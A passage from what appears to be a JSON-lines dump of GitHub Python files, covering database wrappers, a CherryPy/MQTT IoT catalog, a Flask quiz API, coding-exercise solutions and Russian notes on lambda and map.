mysql_\r\nfrom table import table\r\n\r\n\r\nclass ensuring():\r\n def __init__(self, db):\r\n self.db = db\r\n self.ensuringTable = table(['id', 'idUser', 'idCar', 'date', 'outTime', 'backTime'], 'ensuring', ['INT', 'INT', 'INT', 'DATE', 'TIME', 'TIME'])\r\n\r\n def insertToEnsuring(self, ensuringTableValue):\r\n #this function will insert new value into car table\r\n try:\r\n self.db.connect()\r\n ensuringTableValue = mysql_.ConverteToTuple(ensuringTableValue)\r\n self.db.insert(ensuringTableValue, self.ensuringTable)\r\n self.db.close()\r\n return \"Insert To The Table\"\r\n except Exception as e:\r\n return e\r\n def selectAllEnsuring(self):\r\n #this function will return a json of the ensuring table value\r\n try:\r\n self.db.connect()\r\n ensuringTable = self.db.select(self.ensuringTable)\r\n ensuringJsonTable = mysql_.ConverteToJson(self.ensuringTable, ensuringTable)\r\n self.db.close()\r\n return ensuringJsonTable\r\n except Exception as e:\r\n return e\r\n def upadateEnsuring(self, wereList, updateList):\r\n #this function will update a spesific colum in ensuring table\r\n try:\r\n self.db.connect()\r\n self.db.update(self.ensuringTable, updateList, wereList)\r\n self.db.close()\r\n return \"Update The Table\"\r\n except Exception as e:\r\n return e\r\n def deleteEnsuring(self, wereList):\r\n #this function will delete the ensuring from the table\r\n try:\r\n self.db.connect()\r\n self.db.delete(self.ensuringTable ,wereList)\r\n self.db.close()\r\n return \"Delete From The Table\"\r\n except Exception as e:\r\n return e\r\n \r\n def selectSpesificEnsuringr(self, wherelist):\r\n #this function will return a spesific ensuring\r\n try:\r\n self.db.connect()\r\n ensuringTable = self.db.selectWhere(self.ensuringTable , wherelist)\r\n ensuringJsonTable = mysql_.ConverteToJson(self.ensuringTable, ensuringTable)\r\n self.db.close()\r\n return ensuringJsonTable \r\n except Exception as e:\r\n return e\r\n","repo_name":"Jonasinbar/AutoHod","sub_path":"back/ensuring.py","file_name":"ensuring.py","file_ext":"py","file_size_in_byte":2284,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"26528971592","text":"import pandas as pd\n\ndef rising_temperature(weather: pd.DataFrame) -> pd.DataFrame:\n weather = weather.sort_values('recordDate')\n weather['rising'] = weather.temperature.diff() > 0\n weather['consecutive'] = weather.recordDate.diff().dt.days == 1\n return pd.DataFrame(weather[(weather['rising'] == True) & (weather['consecutive'] == True)]['id'])\n\n\n\nif __name__ == '__main__':\n\n df = pd.DataFrame({\n 'id': [1, 2, 3, 4],\n 'recordDate': ['2015-01-01', '2015-01-02', '2015-01-03', '2015-01-04'],\n 'temperature': [10, 25, 20, 30],\n })\n\n df = rising_temperature(df)\n print(df)\n","repo_name":"andrei-radu/leetcode-pandas-mysql","sub_path":"Pandas/197-rising-temperature.py","file_name":"197-rising-temperature.py","file_ext":"py","file_size_in_byte":616,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"31496236914","text":"import uuid\nimport os\n\ncreatures = [\n \"Pinguin\",\n \"Seal\",\n \"Moose\",\n \"Dog\",\n \"Elephant\",\n \"Sloth\",\n \"Gorilla\",\n \"Giraffe\",\n \"Polar Bear\",\n \"Platypus\",\n \"Orca\",\n \"Whale\",\n \"Squirel\",\n \"Mouse\",\n \"Meerkat\",\n \"Flamingo\"\n ]\n\nfilename = str(uuid.uuid4().hex)\n\nwith open(filename, \"w\") as f:\n f.writelines([f'{creature}\\n' for creature in creatures])\n\n# You should not need to modify the code above this line\n# Start to write your code below this line\n\n# Use variable filename the file\n\n\n\n\n\n# Do not remove below code\nos.remove(filename)\n","repo_name":"ludusregio/pattern","sub_path":"file-to-dictionary/start.py","file_name":"start.py","file_ext":"py","file_size_in_byte":653,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"22026215738","text":"from utils.db_api.sqlite import Database\n\ndb = Database()\n\ndef test():\n db.create_table_users()\n users = db.select_all_users()\n print(f\"До добавления пользователей: {users}\")\n db.add_user(1, \"One\")\n db.add_user(2, \"Two\")\n db.add_user(3, \"Tree\")\n users = db.select_all_users()\n print(f\"После добавления пользователей: {users}\")\n user = db.select_user(Name=\"Tree\", id=3)\n print(f\"Получил пользователя {user}\")\n\ntest()\n","repo_name":"TwoThousandGit/financial-bot","sub_path":"utils/db_api/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":558,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"40281297998","text":"import cherrypy, json, os, threading, time\r\nimport paho.mqtt.client as pmqtt\r\n\r\nclass Subscriber:\r\n def __init__(self,clientID,topic,devices,updateFile):\r\n self.clientID = clientID\r\n self.devices = devices\r\n self.updateFile = updateFile\r\n self.topic = topic\r\n self.mypmqtt = pmqtt.Client(clientID, False)\r\n self.mypmqtt.on_message = self.myReceived\r\n self.mypmqtt.on_connect = self.myOnConnect\r\n\r\n def myOnConnect (self, paho_mqtt, userdata, flags, rc):\r\n print(\"Connected to %s with result code: %d\" % (self.messageBroker, rc))\r\n\r\n def start(self):\r\n self.mypmqtt.connect(\"test.mosquitto.org\",1883)\r\n self.mypmqtt.loop_start()\r\n self.mypmqtt.subscribe(self.topic, 2)\r\n\r\n def stop(self):\r\n self.mypmqtt.unsubscribe(self.topic)\r\n self.mypmqtt.loop_stop()\r\n self.mypmqtt.disconnect()\r\n\r\n def myReceived (self, pmqtt , userdata, msg):\r\n data = json.loads(msg.payload)\r\n if msg.topic == \"/tiot/8/devices\":\r\n if \"deviceID\" and \"RESTuri\" and \"MQTTtopic\" and \"resource\" in data:\r\n self.devices[data[\"deviceID\"]] = dict(RESTuri=data[\"RESTuri\"],MQTTtopic=data[\"MQTTtopic\"],resource=data[\"resource\"],insert_timestamp=time.time())\r\n elif msg.topic == \"/tiot/8/users\":\r\n if \"userID\" and \"name\" and \"surname\" and \"email\" in data:\r\n self.devices[data[\"userID\"]] = dict(name=data[\"name\"],surname=data[\"surname\"],email=data[\"email\"])\r\n elif msg.topic == \"/tiot/8/services\":\r\n if \"serviceID\" and \"RESTuri\" and \"MQTTtopic\" and \"type\" in data:\r\n self.devices[data[\"serviceID\"]] = dict(RESTuri=data[\"RESTuri\"],MQTTtopic=data[\"MQTTtopic\"],type=data[\"type\"],insert_timestamp=time.time())\r\n self.updateFile()\r\n\r\n\r\nclass Broker:\r\n exposed = True\r\n\r\n def __init__(self):\r\n self.brokerIP = \"test.mosquitto.org\"\r\n self.brokerPort = \"1883\"\r\n\r\n def GET(self, *uri, **params):\r\n if len(uri) == 0:\r\n return f\"\"\"{{\\\r\n \"brokerIP\": \"{self.brokerIP}\",\r\n \"port\": \"{self.brokerPort}\"\r\n }}\"\"\"\r\n else:\r\n raise cherrypy.HTTPError(404, \"Uri not found.\")\r\n\r\nclass Controller(threading.Thread):\r\n def __init__(self, devices, updateFile):\r\n threading.Thread.__init__(self)\r\n self.devices=devices\r\n self.updateFile = updateFile\r\n\r\n def run(self):\r\n while True:\r\n for key in list(self.devices):\r\n if (time.time()-self.devices[key][\"insert_timestamp\"])>120:\r\n self.devices.pop(key)\r\n self.updateFile()\r\n time.sleep(60)\r\n\r\nclass Devices:\r\n exposed = True\r\n\r\n def __init__(self):\r\n self.devices = dict()\r\n self.readFile()\r\n self.controller = Controller(self.devices, self.updateFile)\r\n self.controller.start()\r\n self.subscriber = Subscriber(\"Devices subscriber\", \"/tiot/8/devices\",self.devices,self.updateFile)\r\n self.subscriber.start()\r\n\r\n def readFile(self):\r\n if os.stat('data.json').st_size != 0: #file non è vuoto\r\n filedict=dict()\r\n f = open('data.json','r')\r\n filedict = json.load(f)\r\n if \"Devices\" in filedict:\r\n self.devices = filedict[\"Devices\"].copy()\r\n f.close()\r\n\r\n def updateFile(self):\r\n filedict=dict()\r\n if os.stat('data.json').st_size != 0:\r\n f=open('data.json','r') \r\n filedict = json.load(f) \r\n f.close()\r\n f=open('data.json','w') \r\n filedict[\"Devices\"] = self.devices.copy()\r\n json.dump(filedict, f)\r\n f.close()\r\n\r\n\r\n def GET(self, *uri, **params):\r\n if len(uri)==1 and uri[0]==\"registered\" and len(params)==0:\r\n if (len(self.devices)==0):\r\n out={\"Error\":\"No registered devices.\"}\r\n return json.dumps(out)\r\n else:\r\n return json.dumps(self.devices)\r\n elif len(uri)==1 and uri[0]==\"registered\" and len(params)==1:\r\n if (len(self.devices)==0):\r\n out={\"Error\":\"No registered devices.\"}\r\n return json.dumps(out)\r\n else:\r\n if \"deviceID\" in params:\r\n if params[\"deviceID\"] in self.devices:\r\n return json.dumps(self.devices[params[\"deviceID\"]])\r\n else:\r\n value=params[\"deviceID\"]\r\n out = {\"Error\": f\"The inserted deviceID:'{value}' is not registered.\"}\r\n return json.dumps(out)\r\n else:\r\n raise cherrypy.HTTPError(400, \"Wrong input format.\")\r\n else:\r\n raise cherrypy.HTTPError(404, \"Uri not found.\")\r\n\r\n def POST(self, *uri, **params):\r\n if len(uri) == 0:\r\n data = json.loads(cherrypy.request.body.read())\r\n if \"deviceID\" and \"RESTuri\" and \"MQTTtopic\" and \"resource\" in data:\r\n self.devices[data[\"deviceID\"]] = dict(RESTuri=data[\"RESTuri\"],MQTTtopic=data[\"MQTTtopic\"],resource=data[\"resource\"],insert_timestamp=time.time())\r\n self.updateFile()\r\n else:\r\n raise cherrypy.HTTPError(400, \"Wrong input format.\")\r\n else:\r\n raise cherrypy.HTTPError(404, \"Uri not found.\")\r\n\r\nclass Users:\r\n exposed = True\r\n\r\n def __init__(self):\r\n self.users = dict()\r\n self.readFile()\r\n self.subscriber = Subscriber(\"Users subscriber\", \"/tiot/8/users\",self.users,self.updateFile)\r\n self.subscriber.start()\r\n\r\n def readFile(self):\r\n if os.stat('data.json').st_size != 0: #file non è vuoto\r\n filedict=dict()\r\n f = open('data.json','r')\r\n filedict = json.load(f)\r\n if \"Users\" in filedict:\r\n self.users = filedict[\"Users\"].copy()\r\n f.close()\r\n\r\n def updateFile(self):\r\n filedict=dict()\r\n if os.stat('data.json').st_size != 0:\r\n f=open('data.json','r')\r\n filedict = json.load(f) \r\n f.close() \r\n f=open('data.json','w') \r\n filedict[\"Users\"] = self.users.copy()\r\n json.dump(filedict, f)\r\n f.close()\r\n\r\n def GET(self, *uri, **params):\r\n if len(uri)==1 and uri[0]==\"registered\" and len(params)==0:\r\n if (len(self.users)==0):\r\n out={\"Error\":\"No registered users.\"}\r\n return json.dumps(out)\r\n else:\r\n return json.dumps(self.users)\r\n elif len(uri)==1 and uri[0]==\"registered\" and len(params)==1:\r\n if (len(self.users)==0):\r\n out={\"Error\":\"No registered users.\"}\r\n return json.dumps(out)\r\n else:\r\n if \"userID\" in params:\r\n if params[\"userID\"] in self.users:\r\n return json.dumps(self.users[params[\"userID\"]])\r\n else:\r\n value=params[\"userID\"]\r\n out = {\"Error\": f\"The inserted userID:'{value}' is not registered.\"}\r\n return json.dumps(out)\r\n else:\r\n raise cherrypy.HTTPError(400, \"Wrong input format.\")\r\n else:\r\n raise cherrypy.HTTPError(404, \"Uri not found.\")\r\n\r\n def POST(self, *uri, **params):\r\n if len(uri) == 0:\r\n data = json.loads(cherrypy.request.body.read())\r\n if \"userID\" and \"name\" and \"surname\" and \"email\" in data:\r\n self.users[data[\"userID\"]] = dict(name=data[\"name\"],surname=data[\"surname\"],email=data[\"email\"])\r\n self.updateFile()\r\n else:\r\n raise cherrypy.HTTPError(400, \"Wrong input format.\")\r\n else:\r\n raise cherrypy.HTTPError(404, \"Uri not found.\")\r\n\r\nclass Services:\r\n exposed = True\r\n\r\n def __init__(self):\r\n self.services = dict()\r\n self.readFile()\r\n self.controller = Controller(self.services, self.updateFile)\r\n self.controller.start()\r\n self.subscriber = Subscriber(\"Services subscriber\", \"/tiot/8/services\",self.services,self.updateFile)\r\n self.subscriber.start()\r\n\r\n def readFile(self):\r\n if os.stat('data.json').st_size != 0: #file non è vuoto\r\n filedict=dict()\r\n f = open('data.json','r')\r\n filedict = json.load(f)\r\n if \"Services\" in filedict:\r\n self.services = filedict[\"Services\"].copy()\r\n f.close()\r\n\r\n def updateFile(self):\r\n filedict=dict()\r\n if os.stat('data.json').st_size != 0:\r\n f = open('data.json','r')\r\n filedict = json.load(f)\r\n f.close() \r\n f = open('data.json','w')\r\n filedict[\"Services\"] = self.services.copy()\r\n json.dump(filedict, f)\r\n f.close()\r\n\r\n def GET(self, *uri, **params):\r\n if len(uri)==1 and uri[0]==\"registered\" and len(params)==0:\r\n if (len(self.services)==0):\r\n out={\"Error\":\"No registered services.\"}\r\n return json.dumps(out)\r\n else:\r\n return json.dumps(self.services)\r\n elif len(uri)==1 and uri[0]==\"registered\" and len(params)==1:\r\n if (len(self.services)==0):\r\n out={\"Error\":\"No registered services.\"}\r\n return json.dumps(out)\r\n else:\r\n if \"serviceID\" in params:\r\n if params[\"serviceID\"] in self.services:\r\n return json.dumps(self.services[params[\"serviceID\"]])\r\n else:\r\n value=params[\"serviceID\"]\r\n out = {\"Error\": f\"The inserted serviceID:'{value}' is not registered.\"}\r\n return json.dumps(out)\r\n else:\r\n raise cherrypy.HTTPError(400, \"Wrong input format.\")\r\n else:\r\n raise cherrypy.HTTPError(404, \"Uri not found.\")\r\n\r\n def POST(self, *uri, **params):\r\n if len(uri) == 0:\r\n data = json.loads(cherrypy.request.body.read())\r\n if \"serviceID\" and \"RESTuri\" and \"MQTTtopic\" and \"type\" in data:\r\n self.services[data[\"serviceID\"]] = dict(RESTuri=data[\"RESTuri\"],MQTTtopic=data[\"MQTTtopic\"],type=data[\"type\"],insert_timestamp=time.time())\r\n self.updateFile()\r\n else:\r\n raise cherrypy.HTTPError(400, \"Wrong input format.\")\r\n else:\r\n raise cherrypy.HTTPError(404, \"Uri not found.\")\r\n\r\nif __name__==\"__main__\":\r\n conf={\r\n '/':{\r\n 'request.dispatch':cherrypy.dispatch.MethodDispatcher(),\r\n 'tool.session.on':True\r\n }\r\n }\r\n\r\n cherrypy.tree.mount(Broker(),'/broker',conf)\r\n cherrypy.tree.mount(Devices(),'/devices',conf)\r\n cherrypy.tree.mount(Users(),'/users',conf)\r\n cherrypy.tree.mount(Services(),'/services',conf)\r\n cherrypy.config.update({'server.socket_host': '0.0.0.0'})\r\n cherrypy.engine.start()\r\n cherrypy.engine.block()","repo_name":"simsax/Internet-of-Things","sub_path":"IoT/SW/SW_2/es_1/catalog.py","file_name":"catalog.py","file_ext":"py","file_size_in_byte":11155,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"21557203297","text":"\"\"\"\n\nRevision ID: a78f4b5d7dee\nRevises: 73d96d3120ff\nCreate Date: 2017-11-16 23:18:23.416997\n\"\"\"\nimport sqlalchemy as sa\nfrom alembic import op\n\n# revision identifiers, used by Alembic.\nrevision = \"a78f4b5d7dee\"\ndown_revision = \"73d96d3120ff\"\n\n\ndef upgrade():\n op.add_column(\n \"users\",\n sa.Column(\n \"has_2fa\", sa.Boolean(), server_default=sa.text(\"false\"), nullable=False\n ),\n )\n op.create_index(op.f(\"ix_users_has_2fa\"), \"users\", [\"has_2fa\"], unique=False)\n\n\ndef downgrade():\n op.drop_index(op.f(\"ix_users_has_2fa\"), table_name=\"users\")\n op.drop_column(\"users\", \"has_2fa\")\n","repo_name":"jazzband/website","sub_path":"migrations/versions/a78f4b5d7dee_.py","file_name":"a78f4b5d7dee_.py","file_ext":"py","file_size_in_byte":621,"program_lang":"python","lang":"en","doc_type":"code","stars":57,"dataset":"github-code","pt":"32"} +{"seq_id":"9615564307","text":"from core import DumpReader, DatabaseHandler\n\nimport sys\ndump = DumpReader('/data/project/wd-analyst/wikidata-20151207-all.json.bz2', 100)\ndata = {}\n\n\nfor item_content in dump.run():\n if item_content['type'] != 'item':\n continue\n no_labels = len(item_content.get('labels', {}))\n no_site_links = len(item_content.get('sitelinks', {}))\n no_descriptions = len(item_content.get('descriptions', {}))\n no_claims = 0\n for pid in item_content.get('claims', {}):\n no_claims += len(item_content['claims'][pid])\n for pid in item_content.get('claims', {}):\n claims = item_content['claims'][pid]\n pid_int = int(pid.split('P')[1])\n for claim in claims:\n uniqe_added = False\n no_qua = len(claim.get('qualifiers', []))\n no_refs = len(claim.get('references', []))\n for ref in claim.get('references', []):\n for snak in ref.get('snaks', []):\n ref_pid = int(snak.split('P')[1])\n data_to_add = [1, no_labels, no_site_links, no_descriptions, no_claims, no_qua, no_refs]\n\n old_data = data.get((ref_pid, 0, 0), [0] * len(data_to_add))\n new_data = [data_to_add[i] + old_data[i] for i in range(len(data_to_add))]\n data[(ref_pid, 0, 0)] = new_data\n\n old_data = data.get((ref_pid, pid_int, 0), [0] * len(data_to_add))\n new_data = [data_to_add[i] + old_data[i] for i in range(len(data_to_add))]\n data[(ref_pid, pid_int, 0)] = new_data\n\n for val in ref['snaks'][snak]:\n try:\n val = val['datavalue']['value']['numeric-id']\n except KeyError:\n pass\n except TypeError:\n pass\n else:\n old_data = data.get((ref_pid, pid_int, val), [0] * len(data_to_add))\n new_data = [data_to_add[i] + old_data[i] for i in range(len(data_to_add))]\n data[(ref_pid, pid_int, val)] = new_data\n\n old_data = data.get((ref_pid, 0, val), [0] * len(data_to_add))\n new_data = [data_to_add[i] + old_data[i] for i in range(len(data_to_add))]\n data[(ref_pid, 0, val)] = new_data\n\ndb_handler = DatabaseHandler('ref')\n\ndb_handler.connect()\ndb_handler.cursor.execute('DROP TABLE ref;')\ndb_handler.finalize()\n\nsql_query = \"\"\"\nCREATE TABLE ref\n(\nref_property INT(15) NOT NULL,\nclaim_property INT(15) NOT NULL,\nvalue INT(15) NOT NULL,\nno_item INT(15) NOT NULL,\nno_labels INT(15) NOT NULL,\nno_site_links INT(15) NOT NULL,\nno_descriptions INT(15) NOT NULL,\nno_claims INT(15) NOT NULL,\nno_qua INT(15) NOT NULL,\nno_ref INT(15) NOT NULL\n);\n\"\"\"\ndb_handler.connect()\ndb_handler.cursor.execute(sql_query)\ndb_handler.finalize()\n\ndb_handler.connect()\nfor case in data:\n val = data[case]\n insert_statement = (\n \"INSERT INTO ref \"\n \"(ref_property, claim_property, value, no_item, no_labels, \"\n \"no_site_links, no_descriptions, no_claims, no_qua, no_ref) \"\n \"VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s)\")\n db_handler.cursor.execute(insert_statement, tuple(case) + tuple(data[case]))\n\ndb_handler.finalize()\n","repo_name":"Ladsgroup/wd-analyst","sub_path":"wd-analyst/ref_based.py","file_name":"ref_based.py","file_ext":"py","file_size_in_byte":3383,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"32"} +{"seq_id":"14634875838","text":"class Solution(object):\n def jump(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: int\n \"\"\"\n curmax,premax,jump=0,0,0\n i=0\n while curmax', methods=['GET'])\ndef get_quiz(quiz_id):\n quiz = [quiz for quiz in quizzes if quiz['id'] == quiz_id]\n if len(quiz) == 0:\n return jsonify({'error': 'Quiz not found'})\n return jsonify(quiz[0])\n\n# Add a new quiz\n@app.route('/quizzes', methods=['POST'])\ndef add_quiz():\n new_quiz = {\n 'id': quizzes[-1]['id'] + 1,\n 'title': request.json['title'],\n 'questions': request.json['questions']\n }\n quizzes.append(new_quiz)\n return jsonify({'message': 'Quiz added successfully'})\n\n# Update an existing quiz\n@app.route('/quizzes/', methods=['PUT'])\ndef update_quiz(quiz_id):\n quiz = [quiz for quiz in quizzes if quiz['id'] == quiz_id]\n if len(quiz) == 0:\n return jsonify({'error': 'Quiz not found'})\n quiz[0]['title'] = request.json['title']\n quiz[0]['questions'] = request.json['questions']\n return jsonify({'message': 'Quiz updated successfully'})\n\n# Delete a quiz\n@app.route('/quizzes/', methods=['DELETE'])\ndef delete_quiz(quiz_id):\n quiz = [quiz for quiz in quizzes if quiz['id'] == quiz_id]\n if len(quiz) == 0:\n return jsonify({'error': 'Quiz not found'})\n quizzes.remove(quiz[0])\n return jsonify({'message': 'Quiz deleted successfully'})\n\nif __name__ == '__main__':\n app.run(debug=True)\n\n# quizzes.py (Data for testing)\nquizzes = [\n {\n 'id': 1,\n 'title': 'General Knowledge Quiz',\n 'questions': [\n {'question': 'What is the capital of France?', 'answer': 'Paris'},\n {'question': 'Who painted the Mona Lisa?', 'answer': 'Leonardo da Vinci'},\n {'question': 'Which planet is known as the Red Planet?', 'answer': 'Mars'}\n ]\n },\n {\n 'id': 2,\n 'title': 'Science Quiz',\n 'questions': [\n {'question': 'What is the atomic symbol for gold?', 'answer': 'Au'},\n {'question': 'Who developed the theory of general relativity?', 'answer': 'Albert Einstein'},\n {'question': 'What is the largest organ in the human body?', 'answer': 'Skin'}\n ]\n }\n]\n","repo_name":"antonovproject21/Quizjoin","sub_path":"Quizjoin.py","file_name":"Quizjoin.py","file_ext":"py","file_size_in_byte":2390,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"9944242050","text":"from collections import defaultdict, deque\n\nv, e = (int(_) for _ in input().split())\n\nedges = []\nundirected = defaultdict(list)\n\nfor _ in range(e):\n u, v = input().split()\n edges.append((u, v))\n undirected[u].append(v)\n undirected[v].append(u)\n directed = defaultdict(list)\n\n root = edges[0][0]\n que = deque([root])\n reverse = False\n new_edges = []\n while que:\n size = len(que)\n for _ in range(size):\n u = que.popleft()\n for v in undirected[u]:\n if reverse:\n directed[u].append(v)\n new_edges.append((u, v))\n\n else:\n directed[v].append(u)\n new_edges.append((v, u))\n reverse = not reverse\n\n result \n \n \n\n","repo_name":"GizawAAiT/Competitive_programming","sub_path":"codeforces/C_Graph_Without_Long_Directed_Paths.py","file_name":"C_Graph_Without_Long_Directed_Paths.py","file_ext":"py","file_size_in_byte":798,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"70998384730","text":"from __future__ import absolute_import\nfrom __future__ import unicode_literals\nimport jpype\nimport jpype.dbapi2 as dbapi2\nimport os\nimport logging\nfrom .base import DrillDialect, DrillCompiler_sadrill\n\n\nclass DrillDialect_jdbc(DrillDialect):\n jdbc_db_name = \"drill\"\n jdbc_driver_name = \"org.apache.drill.jdbc.Driver\"\n\n statement_compiler = DrillCompiler_sadrill\n logging.basicConfig(format='%(asctime)s - %(message)s', level=logging.INFO)\n\n def __init__(self, *args, **kwargs):\n super(DrillDialect_jdbc, self).__init__(*args, **kwargs)\n\n # The user is responsible for starting the JVM with the class path, but we can\n # do some sanity checks to make sure they are pointed in the right direction.\n if not jpype.isJVMStarted():\n raise Exception(\"The JVM must be started before connecting to a JDBC driver.\")\n try:\n jpype.JClass(\"org.apache.drill.jdbc.Driver\")\n except TypeError:\n err = \"The drill JDBC driver class was not located in the CLASSPATH `%s`\"%str(jpype.java.lang.System.getProperty('java.class.path'))\n raise Exception(err)\n\n def initialize(self, connection):\n super(DrillDialect_jdbc, self).initialize(connection)\n\n \"\"\"\n Open a connection to a database using a JDBC driver and return\n a Connection instance.\n dsn: Database url as required by the JDBC driver.\n driver_args: Dictionary or sequence of arguments to be passed to\n the Java DriverManager.getConnection method. Usually\n sequence of username and password for the db. Alternatively\n a dictionary of connection arguments (where `user` and\n `password` would probably be included). See\n http://docs.oracle.com/javase/7/docs/api/java/sql/DriverManager.html\n for more details\n \"\"\"\n def create_connect_args(self, url):\n if url is not None:\n params = super(DrillDialect, self).create_connect_args(url)[1]\n\n # We only need the dsn url as an argument\n cargs = (self._create_jdbc_url(url), )\n\n # Everything else is passed as keywords\n cparams = {p: params[p] for p in params if p not in ['host', 'port']}\n\n logging.info(\"Cargs:\" + str(cargs))\n logging.info(\"Cparams\" + str(cparams))\n\n return (cargs, cparams)\n\n def _create_jdbc_url(self, url):\n return \"jdbc:drill:drillbit=%s:%s\" % (\n url.host,\n url.port or 31010\n )\n\n @classmethod\n def dbapi(cls):\n return dbapi2\n\ndialect = DrillDialect_jdbc\n","repo_name":"JohnOmernik/sqlalchemy-drill","sub_path":"sqlalchemy_drill/jdbc.py","file_name":"jdbc.py","file_ext":"py","file_size_in_byte":2630,"program_lang":"python","lang":"en","doc_type":"code","stars":51,"dataset":"github-code","pt":"32"} +{"seq_id":"44162018520","text":"\"\"\"\nвстроенные функции \n\"\"\"\n\"\"\"\nАнонимные функции - lambda (Обычная функция с одной особенностью, у нее нет имени)\nПринимает сколько угодно параметров, но всегда возврощяет одно выражение\n\"\"\"\n\n# def hello():\n# return 'hello'\n# print(hello())\n\n# x = lambda: 'hello'\n# print(x())\n\n# x = lambda a, b, c: (a * b) % c\n# print(x(5, 5, 5))\n\n# x = lambda num1, num2, degree=None: (num1 * num2) ** degree if degree else num1 * num2 \n# print(x(2, 2, 3))\n# print(x(5, 5))\n\n# def myFunc(n):\n# return lambda num: num * n\n\n# my_doubler = myFunc(2)\n# print(my_doubler(50))\n\n# list_ = ['hello', 'mil', 'john', 'daniel', 'vlad']\n# a = sorted(list_, key=len, reverse=True)\n# print(a)\n\n# dict_ = {\n# 'john': 500,\n# 'tirion': 160_000,\n# 'tom': 150,\n# 'sanchar': 20,\n# 'ayana': 100_000,\n# }\n# print(dict_.items())\n# new_dict = dict(sorted(dict_.items(), key=lambda x: x [1], reverse=True))\n# print(new_dict)\n\n\"\"\"\nmap(function, iterable) - применяет к каждому элементу внутри iterable функцию,\n которая мы ей передаем в function, \nзакидывая в результат те данные, которые возврощает функции. \nВ результате мы получаем mapobject(iterator), в котором хранятся все наши данные.\n\"\"\"\n\n# ls = ['one', 'two', 'three', 'four']\n\n# new_list = list(map(lambda x: x.capitalize(), ls))\n# print(new_list)\n\n\n# ls = ['1', '2', '3']\n\n# new_list = list(map(int, ls))\n# print(new_list)\n\n\n# names = ['john', 'aria', 'baku', 'bakberdi', 'lilo']\n\n# new_list = list(map(lambda x: f'Hello mr\\mrs {x}', names))\n# print(new_list)\n\n\n'''\nФункция высшего порядка - функция, \nпринемает в качестве аргумента другую функцию\n'''\n'''\nfilter(function, iterable) - принемает ко всем элементам iterable функции, \nкоторую мы передали и возврощаем filterobject(итератор) только с теми элементами, \nдля которых функция вернула True\n'''\n\n# ls = ['one', 'lili', 'oleg', 'billi', 'tirion']\n# res = list(filter(lambda x: len(x) > 4, ls))\n# print(res)\n\n'''\nenumerate(iterable) - пронумеровывает каждый элемент внутри iterable ее собственным индексом \n'''\n\n# ls = ['str1', 'str2', 'str3']\n# new_list = list(enumerate(ls))\n# print(new_list)\n\n# def calculate_virus_cells(hours):\n# bact_per_min = 4\n# time_to_combine = 100 / bact_per_min\n# virus_cells_per_combine = 1\n# virus_cells = 1\n# for i in range(60 * hours):\n# new_bacteria = bact_per_min * virus_cells\n# if new_bacteria >= 100:\n# virus_cells += new_bacteria // 100\n# new_bacteria %= 100\n# virus_cells *= virus_cells_per_combine\n# virus_cells_per_combine += 1\n# return virus_cells\n# зк\n\n# def calculate_virus_cells(hours):\n# bact_per_min = 4\n# time_to_combine = 100 / bact_per_min\n# virus_cells_per_combine = 1\n# virus_cells = 1\n# for i in range(60 * hours):\n# new_bacteria = bact_per_min * virus_cells\n# if new_bacteria >= 100:\n# virus_cells += new_bacteria // 100\n# new_bacteria %= 100\n# virus_cells *= virus_cells_per_combine\n# virus_cells_per_combine += 1\n# return virus_cells\n\n# print(calculate_virus_cells(60)) # выведет 144\n\n#------------------------------------------------------------------\n\n# ls = [1, 2, 3, 4, 5]\n# new_list = list(map(lambda x: x * 82 if x % 2 == 0 else x, ls))\n# print(new_list)\n\n\n\n# from typing import List\n\n# class Solution:\n# def separateDigits(self, nums: List[int]) -> List[int]:\n# result = []\n# for num in nums:\n# digits = []\n# while num > 0:\n# digits.append(num % 10)\n# num //= 10\n# result.append(digits[::-1])\n# return result\n\n\n\n\nclass Alphabet:\n def __init__(self):\n self.a = 'QWERTY'\n self.c = 'ASDF'\n print(self.__c)\nobj = Alphabet()\nprint(obj.a)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"oldkayden/ev.28","sub_path":"Чисто для задание /builtin_func.py","file_name":"builtin_func.py","file_ext":"py","file_size_in_byte":4349,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"5424122070","text":"import aiohttp\nfrom .dto import SearchResponse\n\nDEFAULT_FILTER = '!9_bDE.BDp'\n\n\nclass StackexchangeException(Exception):\n pass\n\n\nclass StackExchange:\n base_url = 'https://api.stackexchange.com/2.2'\n\n @classmethod\n async def search(cls, intitle, page=1, pagesize=25, sort=None, order=None, filter_=DEFAULT_FILTER):\n params = {\n 'site': 'stackoverflow',\n 'intitle': intitle,\n 'page': page,\n 'pagesize': pagesize,\n 'sort': sort,\n 'order': order,\n 'filter': filter_\n }\n params = {key: value for key,\n value in params.items() if value is not None}\n\n async with aiohttp.ClientSession() as session:\n async with session.get(f'{cls.base_url}/search', params=params) as response:\n if response.status != 200:\n raise StackexchangeException(response.reason, await response.text())\n\n return SearchResponse(await response.json())\n","repo_name":"ramgml/stackexchange_service","sub_path":"stackexchange_client/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":1009,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"30038794817","text":"\"\"\"\r\n\n\nGiven a list of 2D points `[x, y]`, create a function that returns `True` if\nthose points can be on the _bounds_ of a rectangle, `False` otherwise.\n\n![](https://edabit-challenges.s3.amazonaws.com/fhh2XNW.png)\n\n### Examples\n\n on_rectangle_bounds([[0, 1], [1, 0], [1, 1], [0, 0]]) ➞ True\n \n on_rectangle_bounds([[0, 1], [1, 0], [1, 1], [0.5, 0.5]]) ➞ False\n \n on_rectangle_bounds([[0, 